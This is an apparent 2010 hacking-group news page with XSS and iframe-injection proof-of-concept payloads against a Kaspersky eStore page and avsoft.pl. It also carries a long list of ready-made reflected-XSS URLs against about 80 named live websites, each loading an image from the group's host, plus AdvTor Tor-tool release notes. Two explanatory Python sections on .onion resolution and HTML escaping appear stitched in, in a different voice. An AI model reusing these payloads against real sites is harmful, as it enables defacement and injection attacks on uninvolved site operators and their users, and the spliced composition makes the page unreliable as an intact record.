News


Kaspersky eStore Powered by Softkey.ru XSS Vulnerability

Vulnerable page: http://kaspersky.softkey.ru/basket/

PoC:

Code:
"<br /><br /><img src=http://nemesis.te-home.net/img/logo.jpg /><br /><a href=http://nemesis.te-home.net/>http://nemesis.te-home.net/</a><a b=


http://desmond.yfrog.com/Himg80/scaled.php?tn=0&server=80&filename=kaspbasket.png&xsize=640&ysize=640

Note: This is a proof of concept and it doesn't reflect the views or interests of all above websites.

Submitted on 2010-09-02 by [-TE-]-RoLex (0 comments)

avsoft.pl - XSS & IFrame Injection

Vulnerable page - http://www.avsoft.pl/pl/order.html?action=confirm

PoC:
Code:
"><h1>XSS BY TEAM ELITE</h1>
and
Code:
"><iframe src=http://nemesis.te-home.net></iframe>


http://img294.imageshack.us/img294/7066/avastqp.png

Submitted on 2010-09-01 by [-TE-]-Neo (0 comments)

AdvTor 0.1.0.5

New release of Advanced TOR: version 0.1.0.5.

Changes:
  • corrected: if LoadLibrary failed in target process, it was still shown as intercepted
  • corrected: when unloading the AdvTor.dll, UnloadDLL did not wait for PipeThread to finish
  • corrected: high CPU usage if no running exit nodes were found (thanks to RoLex for reporting this problem)
  • corrected: system tray menus were not closed when the user clicked outside them
  • corrected: AdvTor.dll did not always close handles of remote threads
  • corrected: AdvTor.dll did not always free the memory it allocated in other processes
  • corrected: AdvTor.dll did not intercept process creation functions if the option to fake local time was disabled
  • corrected: intercepted processes that were not updated in GUI were not released when AdvTor exited
  • corrected: intercepting functions in suspended processes sometimes failed
  • corrected: AdvTor.dll could re-hook same procedure twice if a previous instance was terminated from task manager
  • corrected: AdvTor.exe will no longer attempt to intercept itself if the user selects it from process list (thanks to RoLex for reporting this error)
  • if no running exit nodes can be found for selected country, the notification message is shown only once, until a good exit node is found (thanks to RoLex for reporting this problem)
  • the confusing message "attempt to bypass proxy settings" is replaced with "redirecting connection from address" (thanks to Meka][Meka for reporting this problem)
  • system tray menu has a new submenu "Release" with all intercepted processes to allow unloading AdvTor.dll from them
  • AdvTor.dll now shows more information about interception failures
  • AdvTor.dll no longer loads user32.dll in intercepted processes
  • AdvTor.dll also intercepts functions gethostbyname, WSAAsyncGetHostByName, gethostbyaddr, WSAAsyncGetHostByAddr (Windows 2000+), getnameinfo, GetNameInfoW, getaddrinfo, GetAddrInfoW (Windows XP SP2+) (thanks to RoLex for helping with tests)
  • programs that are intercepted by AdvTor will have all DNS queries and reverse DNS queries resolved by OR network
  • programs that are intercepted can access .onion addresses, AdvTor.dll will resolve them to an IP within range 127.16.* (localhost) and will keep a cache with generated IPs and corresponding .onion addresses to use in connection requests
  • process tree also shows PID values when selecting a window
  • when AdvTor.dll sends a notification about an intercepted process that doesn't respect proxy settings, it also shows the PID for that process (requested by RoLex)
  • the lists with exit nodes will also have an entry "no exit", for those who want only to see where an intercepted program would connect, but without allowing it to connect or to send anything
  • added verification for "localhost" so an intercepted process won't try to use OR network to resolve it (Opera resolves "localhost" every time you save a file)
  • added verification for "wpad" to prevent vulnerable applications from using OR network to resolve it (Chrome, IE, Yahoo Messenger, etc.)

Download:



Version 0.1.0.5 of Advanced TOR can intercept all DNS / reverse DNS queries and redirect them to OR network. If an application doesn't always use its configured proxy settings, a warning message is shown in Debug window and its connection attempts and DNS queries are redirected. Those familiar with Tor know that Tor can work with addresses that cannot be resolved by normal name servers. Addresses of hidden services (*.onion) are valid only in OR network but they are connect-only and they don't resolve to an IP. In this particular case, when a program calls a resolve function for an .onion address, AdvTor will return a fake IP in range 127.16.* and it will keep a cache with fake IPs + corresponding .onion addresses that will be used when a program wants to connect to one of these addresses.
As an example, let's see how we can use telnet to connect to the hidden wiki. First, we start a command prompt and use the "Force TOR" option to intercept its process creation functions and Winsock calls.

http://img691.imageshack.us/img691/8705/telnet1.png

To use telnet to connect to the hidden wiki, we can use the following command:
Code:
telnet kpvz7ki2v5agwt35.onion 80


http://img835.imageshack.us/img835/9609/telnet2.png

http://img189.imageshack.us/img189/1908/advtor1.png

When the connection is established, a good HTTP request can be sent with telnet:
Code:
GET /wiki/index.php/Main_Page HTTP/1.0
Accept: */*
Accept-Language: en-us
Accept-Encoding: identity
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: kpvz7ki2v5agwt35.onion
Connection: Keep-Alive



http://img685.imageshack.us/img685/7272/telnet3.png

See also:



Submitted on 2010-08-29 by Vektor (0 comments)
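As an added illustration of the .onion handling and the "localhost" / "wpad" checks described in the 0.1.0.5 notes above, here is a stand-alone Python model of that resolution policy. It is not AdvTor's code (AdvTor.dll hooks Winsock calls inside the intercepted process); the class name, the `forward` callback standing in for "resolve via OR network", and the 203.0.113.10 answer it returns are constructed for this example. What it shows is the part a reader cannot see in the screenshots: a .onion name gets a stable fake address from 127.16.0.0/16, connect() can map that address back to the name, and the two names that must never leak to the network are answered or refused locally before any forwarding happens.

```python
import ipaddress
from typing import Callable, Dict, List, Optional

# Model of the name-resolution policy from the AdvTor 0.1.0.5 release notes.
# Constructed for illustration; AdvTor itself implements this inside AdvTor.dll.
FAKE_NET = ipaddress.IPv4Network("127.16.0.0/16")   # the "127.16.*" range named in the notes


class OnionResolverModel:
    """Decides what an intercepted process gets back from a resolve call."""

    def __init__(self, forward: Callable[[str], Optional[str]]):
        self._forward = forward               # stand-in for a lookup over the OR network
        self._by_name: Dict[str, str] = {}    # .onion name -> fake IP
        self._by_ip: Dict[str, str] = {}      # fake IP -> .onion name (used on connect)
        self._next = 1                        # next host index; index 0 is the network address

    def resolve(self, hostname: str) -> Optional[str]:
        name = hostname.strip().rstrip(".").lower()
        if name == "localhost":
            return "127.0.0.1"                # answered locally, never sent to the OR network
        if name == "wpad":
            return None                       # refused: proxy auto-discovery must not leak
        if name.endswith(".onion"):
            return self._fake_ip_for(name)    # connect-only name: hand out a cached fake IP
        return self._forward(name)            # everything else is resolved over the OR network

    def _fake_ip_for(self, onion: str) -> str:
        ip = self._by_name.get(onion)
        if ip is None:
            if self._next >= FAKE_NET.num_addresses - 1:
                raise RuntimeError("fake address pool exhausted")
            ip = str(FAKE_NET.network_address + self._next)
            self._next += 1
            self._by_name[onion] = ip
            self._by_ip[ip] = onion
        return ip

    def connect_target(self, ip: str) -> str:
        """On connect(): translate a fake IP back to the .onion name it stands for."""
        return self._by_ip.get(ip, ip)

    def is_fake(self, ip: str) -> bool:
        return ipaddress.IPv4Address(ip) in FAKE_NET


def demo() -> dict:
    """Run the policy over the cases the release notes describe and collect the results."""
    forwarded: List[str] = []

    def forward(name: str) -> Optional[str]:
        forwarded.append(name)
        return "203.0.113.10"                 # constructed answer (TEST-NET-3), not a real lookup

    r = OnionResolverModel(forward)
    onion = "kpvz7ki2v5agwt35.onion"          # the hidden wiki address used in the post above
    first = r.resolve(onion)
    second = r.resolve(onion)                 # must hit the cache and return the same fake IP
    return {
        "onion_ip": first,
        "stable": first == second,
        "is_fake": r.is_fake(first),
        "back": r.connect_target(first),
        "localhost": r.resolve("localhost"),
        "wpad": r.resolve("wpad"),
        "clearnet": r.resolve("example.com"),
        "forwarded": list(forwarded),         # only the clearnet name should appear here
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The `forwarded` list is the point of the model: after the whole run it holds only `example.com`, which is the property the "localhost" and "wpad" entries in the change list are there to guarantee.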

Collection of XSS vulnerable websites

Here's a list with XSS vulnerable websites that doesn't require POST method for submitting a query:

http://www.serials.ws/?chto=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://subscene.com/filmsearch.aspx?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.zebulon.fr/search.php?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://promoddl.com/ddl.php?q=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://keygenguru.com/search/?search=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.crackserver.com/search.php?name=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.zcrack.com/crack_download_search.php?crack=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://keygens.nl/cracked_warez_search.php?s=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.crackfind.com/test.php?chto=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.supercracks.net/search.php?crack=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.mucacadownloads.com/search.php?where=&what=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.andr.net/?str=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://search.gamecopyworld.com:9999/data/gcw.shtml?search=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.smartcracks.com/search.php?crack=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.cracklooker.com/search.shtml?s=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://crackcrew.com/search.php?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.smartserials.com/search_serial.php?serials=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.serialsws.org/?chto=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.freedownloadscenter.com/Search/newsearch.php3?Category=0&S_S=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.serialbay.com/search.html?q=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.superserials.com/search.php?s=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.torrentpharma.com/search.php?searWords=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://search.monova.org/search.php?term=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://ligg.org/search_torrent/?s=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://torrent.jiwang.cc/torrents-search.php?search=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://torrentman.com/search.php?search=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://extratorrent.com/search/?search=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.areze.com/videos.php?vq=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.tooorgle.com/results.php?security=666&q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://searchenginewatch.com/sew_search_results?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://en.kingofsat.net/find.php?question=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.snap.com/classicsearch.php?query=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.the-breaks.com/search.php?term=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.opendrivers.com/search.php?search=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.nodevice.com/search/search.html?text=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.givemefile.net/?q=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.itprofessionals.co.uk/searchresults.asp?keyword=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://se.creative.com/search/?keywords=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://rapidpedia.com/?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.searchshared.com/?key=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.rapidsharedata.com/tag/%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.filesearch.gr/?q=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.rapid4files.com/rapidshare.php?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://rapidtrend.com/?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://filefab.com/index.php?psearch=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.sensus.se/Sok/Sok-pa-webbplatsen/?searchquery=%22%3Cimg%20src=http%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://nt.se/sok/?querystring=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.undertexter.se/?p=soek&str=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://nyheter24.se/filmtipset/search.cgi?search_value=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://feber.se/search/?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://xage.ru/tag.php?tag=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://search.mywebsearch.com/mywebsearch/AJmain.jhtml?searchfor=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.pics4learning.com/?query=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.poemhunter.com/search/?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www-spires.fnal.gov/spires/find/hep/?rawcmd=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://blindsearch.fejus.com/?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://web1.exactseek.com/webclient/?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.mega-search.net/search.php?group=audio&terms=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.librarything.com/search_author.php?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://thenextweb.com/?s=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.mp3hunting.com/?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.addall.com/New/submitNew.cgi?query=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://metasearch.com/www2search.cgi?p=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.chemindustry.com/apps/search/?search_term=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.webhostingsearch.com/search?searchString=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.musicrobot.com/cgi-bin/search.pl?terms=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://domain-search.domaintools.com/?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.fco.gov.uk/en/advanced-search?t=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.socialworksearch.com/cgi/socialwork.cgi?Terms=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.hostsearch.com/search_results.asp?zoom_query=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://cpan.uwinnipeg.ca/search?query=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.displaysearch.com/cps/rde/xchg/displaysearch/hs.xsl/search_results.asp?txtSearchText=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.culturalheritage.net/cgi-bin/search/hyperseek.cgi?Terms=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://infomine.ucr.edu/cgi-bin/canned_search?query=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.filez.com/?q=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.hyperdictionary.com/search.aspx?define=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E
http://www.dict.org/bin/Dict?Query=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.ldoceonline.com/noresult/?q=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.wordsmyth.net/?ent=%22%3Cimg%20src=http://nemesis.te-home.net/img/logo.jpg%20/%3E
http://www.allwords.com/query.php?Keyword=%22%3Cimg%20src%3Dhttp%3A%2F%2Fnemesis.te-home.net%2Fimg%2Flogo.jpg%20%2F%3E

Note: This is a proof of concept and it doesn't reflect the views or interests of all above websites.

This collection is to be continued, as well as a collection of websites that require POST method for submitting a query.

Submitted on 2010-08-27 by [-TE-]-RoLex (0 comments)
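Every link in the list above carries the same query string, `%22%3Cimg ... %2F%3E`, which decodes to a double quote followed by an `<img>` tag. The quote closes the attribute the search page echoes the term into, and the rest of the string is then parsed as markup. The Python below is an added, defender-side illustration that is not part of the post: a constructed search template rendered the way these pages do it (raw concatenation) next to the same template with HTML attribute encoding, plus a helper that pulls the reflected parameter out of a URL. The `search.example` host and the `q` parameter are constructed; the payload string is the one the page's links already use.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# The decoded form of the query string carried by the links in the post above.
PAYLOAD = '"<img src=http://nemesis.te-home.net/img/logo.jpg />'

# Constructed URL for the example, built from the payload the same way the links are.
SAMPLE_URL = "http://search.example/search.php?q=" + quote(PAYLOAD, safe="")


def reflected_query(url: str, param: str) -> str:
    """Return the decoded value of one query parameter (empty string if absent)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get(param, [""])[0]


def render_unsafe(term: str) -> str:
    """Vulnerable pattern: the search term is concatenated straight into an attribute."""
    return f'<input type="text" name="q" value="{term}">'


def render_safe(term: str) -> str:
    """Fixed pattern: encode &, <, >, " and ' so the term cannot leave the attribute."""
    return f'<input type="text" name="q" value="{html.escape(term, quote=True)}">'


def breaks_out(rendered: str) -> bool:
    """Crude check: the template opens exactly one tag, so a second '<' means injection."""
    return rendered.count("<") > 1


if __name__ == "__main__":
    term = reflected_query(SAMPLE_URL, "q")
    print("reflected term :", term)
    print("unsafe render  :", render_unsafe(term), "-> injected" if breaks_out(render_unsafe(term)) else "")
    print("safe render    :", render_safe(term))
```

The encoding has to match the context the value lands in: `html.escape(..., quote=True)` is right for text and quoted attribute values, which is the case every link in the list exercises, but a term echoed into JavaScript, a URL, or an unquoted attribute needs that context's own encoder.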

AdvTor 0.1.0.4

AdvTor 0.1.0.4 can find a process by selecting a window it created. When a window is selected, AdvTor will show a tree with all processes that have same executable name as the process that created the window and all child processes created by them.

http://img840.imageshack.us/img840/7223/chrome1.png

Usually, most people who change proxy settings in their browsers want to check their new IP. One of the most visited websites by people who want to check their IP is http://www.whatismyip.com . Unfortunately, most Tor exit nodes are banned there.

http://img829.imageshack.us/img829/9498/chrome2c.png

Can a website be DoS'ed with a request every 5 minutes? A website hosted on a dial-up connection can handle more. To bypass this ban, first we enable tracking for ".whatismyip.com" address.

http://img826.imageshack.us/img826/1908/advtor1.png

We search for an exit node that is not banned.

http://img717.imageshack.us/img717/1797/advtor2.png

To make sure that every time you visit www.whatismyip.com the node that is not banned is used as exit node, select the option to remember exit for www.whatismyip.com .

http://img829.imageshack.us/img829/1730/advtor3.png

Changes:
  • GeoIP information is included as a pre-compiled search tree, GeoIP lookup functions are written in asm; also, a conversion program is included to convert a downloaded GeoIPCountryWhois.csv to geoip_c.h (csv2asm)
  • AdvTor now also intercepts CreateProcessAsUser from advapi32.dll
  • context menu from debug window has more options related to selected text if an address is found in it: track exit for selected_host (config option: TrackHostExits), remember/forget exit for selected_host (config option: AddressMap)
  • debug messages shown by AdvTor.dll have different severity levels
  • current exit node is shown in title bar
  • added a DialogBox for selecting a specific exit node or a country from which a random exit node will be chosen (accessible from "New identity" or from systray menu option "Advanced")
  • added a "Process Finder" DialogBox to help selecting a process by selecting a window it created
  • system tray menu has a list with 30 usable exit nodes
  • AdvTor verifies the minimum required version of AdvTor.dll (version 0.1.0.4 requires AdvTor.dll 0.1.0.4)


Download:



Submitted on 2010-08-21 by Vektor (0 comments)


